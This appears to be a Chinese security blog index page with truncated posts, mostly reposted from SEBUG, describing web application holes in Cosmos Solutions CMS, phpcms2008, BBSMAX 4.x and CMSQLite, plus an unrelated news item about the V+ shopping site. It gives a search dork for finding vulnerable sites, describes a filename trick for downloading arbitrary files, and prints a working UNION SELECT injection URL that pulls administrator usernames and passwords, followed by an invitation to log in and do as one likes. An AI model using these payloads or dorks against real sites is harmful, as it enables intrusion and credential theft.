教主's Blog

作者：gendenk
漏洞形成原因是由于某种原因p_inf.php的page参数和index.php的id获取的时候过滤不严格而造成的，可以在GOOGLE中直接搜索：Webdesign Cosmos Solutions查找Cosmos Solutios cms这类程序。利用方法

http://jiaozhu.org/p_inf.php?page=[SQL Injection]
http://jiaozhu.org/index.php?id=[SQL Injection]  

影响版本：phpcms2008sp4_UTF8_100510
1.首先看comment\down.php的12行

if(preg_match('/\.php$/',$f) || strpos($f, ":\\")) showmessage('地址有误');

只判断文件后辍 PHP，但没有考虑到在win系统中，文件名为：“xx.php ” 后面多了一个空格。也会被认为是 xx.php文件，因此，利用这个原理，当phpcms运行在win系统下，我们可以下载任意文件
2.查看ads\include\ads.class.php的//110行 阅读全文 »

转载：SEBUG
影响版本:
BBSMAX 4.x
漏洞描述:
在文件 register.aspx.cs 中

protected void Page_Load(object sender, EventArgs e)
{
    string str = string.Empty;
    str = base._Request.Get("active", Method.Get);
    if (!string.IsNullOrEmpty(str))
    {
        if (BOBase<UserBO&gt:.Instance.ActivingUser(str))    //激活用户
        {
            base.ShowSuccess("恭喜！您的账号" + base.My.Username + "已成功激活。", BbsRouter.GetUrl("default"));
        }

在激活用户的过程代码如下： 阅读全文 »

转载：SEBUG
影响版本:
CMSQLite <= 1.2
CMSQLite是基于PHP和SQLite的内容管理系统，CMSQlite的index.php页面存在本地文件包含漏洞

if(isset($_GET['mod'])){
    $module=$_GET['mod'];
}else{
    $module="index";
}
...
if(file_exists("template/".$module.".php")){
   include "template/".$module.".php";
}else{
   include "template/index.php";
}

通过更改mod URL参数就可以包含webserver上的任意文件，导致泄漏敏感信息。 阅读全文 »

作者：IHTeam
测试环境：Win/Linux
首先我们需要注册一个用户，完成之后用注册用户登录，访问注入地址即可暴出管理员用户名和密码了，给个示例地址

http://jiaozhu.org/php/partie_administrateur/administration.php?page=projet_contribution&id_contribution=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(prenom,char(58),motdepasse),3,4,5,6/**/FROM/**/utilisateurs

登录吧，自由发挥

继Vancl(凡客诚品)之后，业内资深人士陈年筹备一年创办的另外一家B2C平台网站V+(vjia.com)今日上线。V+销售Nike、Adidas、Lee、G-star等非自由品牌，定位85后市场。

Vancl公司公关部介绍，V+筹备近一年，Vancl创始人、董事长兼CEO陈年安排了凡客诚品创业团队的主力成员：营销副总裁钟恺欣、技术副总裁崔晓琦等着手筹备。 阅读全文 »